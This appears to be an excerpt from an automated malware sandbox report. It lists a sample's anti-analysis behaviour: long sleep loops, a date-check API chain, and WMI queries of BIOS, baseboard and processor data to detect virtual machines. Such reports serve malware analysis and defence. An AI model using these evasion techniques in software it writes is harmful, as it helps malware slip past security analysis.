Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597062
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596953
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596844
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596734
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596625
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596515
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596406
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596297
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596187
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596078
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595932
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595813
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595700
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595579
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595466
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595344
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595234
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595125
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595016
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594906
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594797
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594687
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594578
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594469
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594344
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594234
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594125
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599889
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599781
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599671
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599562
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599453
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599343
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599234
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599125
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599015
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598906
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598796
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598686
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598578
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598461
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598310
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598185
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598078
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597968
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597859
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597750
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597640
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597531
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597421
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597312
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597203
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597093
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596981
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596875
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596765
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596656
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596546
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596437
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596328
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596218
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596109
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595999
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595890
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595781
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595671
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595562
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595453
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595343
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595234
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595125
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595015
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594891
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594765
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594656
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594546
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594437

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\Public\Libraries\xrbjyllC.pif	Window / User API: threadDelayed 2941	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Window / User API: threadDelayed 6101	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Window / User API: threadDelayed 1823
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Window / User API: threadDelayed 8024
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Window / User API: threadDelayed 7725
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Window / User API: threadDelayed 2129

Found evasive API chain (date check)

Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe

Evasive API call chain: GetLocalTime,DecisionNodes

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4144	Thread sleep count: 2941 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4144	Thread sleep count: 6101 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -599203s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -598969s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -598860s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -598735s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -598610s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -598485s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -598222s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -598068s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -597946s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -597844s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -597719s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -597110s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -596981s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -596875s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -596767s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -596640s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -596528s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -596416s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -596304s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -596188s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -596050s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -595938s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -595810s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -595698s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -595585s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -595249s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -595123s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -594911s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -594789s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -594677s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -594564s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -594439s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -594313s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -594177s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -593997s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -593860s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -593658s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -593506s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -593369s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -593196s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -593011s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -592620s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -592105s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -591918s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -591659s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep count: 34 > 30
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -600000s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4312	Thread sleep count: 1823 > 30
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4312	Thread sleep count: 8024 > 30
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -599891s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -599781s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -599672s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -599562s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -599453s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -599344s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -599234s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -599124s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -599007s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -598891s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -598780s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -598422s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -598297s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -598172s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -598062s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -597953s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -597844s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -597719s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -597609s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -597500s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -597391s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -597281s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -597172s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -597062s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -596953s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -596844s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -596734s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -596625s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -596515s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -596406s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -596297s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -596187s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -596078s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -595932s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -595813s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -595700s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -595579s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -595466s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -595344s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -595234s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -595125s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -595016s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -594906s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -594797s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -594687s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -594578s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -594469s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -594344s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -594234s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -594125s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -28592453314249787s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -600000s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -599889s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -599781s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -599671s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -599562s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -599453s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -599343s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -599234s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -599125s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -599015s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -598906s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -598796s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -598686s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -598578s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -598461s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -598310s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -598185s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -598078s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -597968s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -597859s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -597750s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -597640s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -597531s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -597421s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -597312s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -597203s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -597093s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -596981s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -596875s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -596765s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -596656s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -596546s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -596437s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -596328s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -596218s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -596109s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -595999s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -595890s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -595781s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -595671s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -595562s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -595453s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -595343s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -595234s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -595125s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -595015s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -594891s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -594765s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -594656s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -594546s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -594437s >= -30000s

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Last function: Thread delayed
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031C5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	3_2_031C5908
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe	Code function: 13_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime,	13_2_0040128D
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe	Code function: 13_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose,	13_2_00401612

Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599438	Jump to behavior
